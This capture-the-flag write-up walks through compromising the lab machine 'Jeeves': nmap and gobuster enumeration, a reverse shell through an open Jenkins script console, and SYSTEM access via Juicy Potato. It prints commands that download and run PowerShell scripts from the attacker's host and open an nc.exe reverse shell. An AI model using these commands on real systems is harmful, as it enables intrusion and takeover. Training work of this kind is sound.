# Jeeves
## Reconnaissance
First we want to run a initial nmap scan to see what ports are open and what services are on those ports.
```hcl
nmap -sC -sV -oA nmap/init 10.129.174.184
```
* **-sC**: run default nmap scripts
* **-sV**: detect service version
* **-oA**: output all formats to *nmap/initial*
We get back the following information:
{% code title="init.nmap" %}
```hcl
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-23 20:19 EDT
Nmap scan report for 10.129.174.184
Host is up (0.034s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Ask Jeeves
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-title: Error 404 Not Found
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-03-24T05:19:57
|_ start_date: 2022-03-24T05:08:21
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 4h59m58s, deviation: 0s, median: 4h59m57s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.19 secondshcl
```
{% endcode %}
## Enumeration
### Passive Enumeration
#### IIS Directory Enumeration
```bash
gobuster dir -u http://10.129.174.184 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt
```
#### Jetty Directory Enumeration
```
gobuster dir -u http://10.129.174.184:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o iis.txt
```
### Active Enumeration
#### Exploring IIS
Looking at the http site we are presented with a search bar
Searching takes you to error.html which turns out to just be an image
Source code for site, the action results in error.html
```html
Ask Jeeves
```
#### Exploring Jetty
Quickly checking gobuster for jetty shows that we have a directory to check out
Going there we see Jenkins!
Turns out we have command execution without needing to be logged in which works in our favor
## Initial Access
Using Nishang Invoke-PowerShellTcp.ps1 script we can create a reverse shell and get access to the box
{% embed url="" %}
First we want to copy the example to the bottom of the script so that it is run when copied to the machine we are attacking
Next we want to get a web server running and a netcat listener to catch the reverse shell. In this se I am using [updog](https://github.com/sc0tfree/updog) for my simple web server.
Using the script console again I run this command to download and execute the invoke powershell tcp reverse shell script
And we get a shell back!
This allows us to get user.txt!
## Privilege Escalation
### Juicy Potato
Next we want to run PowerUp.ps1 however we want to use the dev branch as it has extra checks
{% embed url="" %}
Then we want to run these commands in our reverse shell
```powershell
IEX(New-Object Net.WebCLient).downloadString('http://10.10.14.92/PowerUp.ps1')
Invoke-AllChecks # This runs the powershell function to check everything
```
Right away we see SeImpersonatePrivilege which means this box is vulnerable to Juicy Potato!
{% embed url="" %}
We first need to download JuicyPotato.exe to the box which I am hosting from my kali box
We need to copy kali's nc.exe to the windows box
```powershell
# nc.exe is located /usr/share/windows-resources/binaries/nc.exe on kali
Invoke-WebRequest "http://10.10.14.92/nc.exe" -OutFile "nc.exe"
```
Next we want to run JuicyPotato!
This is the input I used:
* **-t: \***
* **-p:** c:\windows\system32\cmd.exe
* **-a:** "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001"
* **-l:** 9001
```powershell
cmd /c jp.exe -l 9001 -p c:\windows\system32\cmd.exe -a "/c c:\users\kohsuke\desktop\nc.exe -e cmd.exe 10.10.14.92 9001" -t *
```
We got nt authority\system!
When we try and take a look at the administrators desktop we see hm.txt with an interesting message
Then I tried this
Alternate Data Streams, find more about them here
{% embed url="" %}
We can direct this into more and get the flag
```
C:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
afbc5bd4b615a606 # Only first 16 bytes of hash shown
```
## Lessons Learned
* Restrict who can access the Jenkins management as this opens up unauthorized access
* In some instances a file using alternate data streams could be an indicator of compromise
* Be careful of which service users have SeImpersonatePrivilege as this could allow an attacker to easily escelate their privileges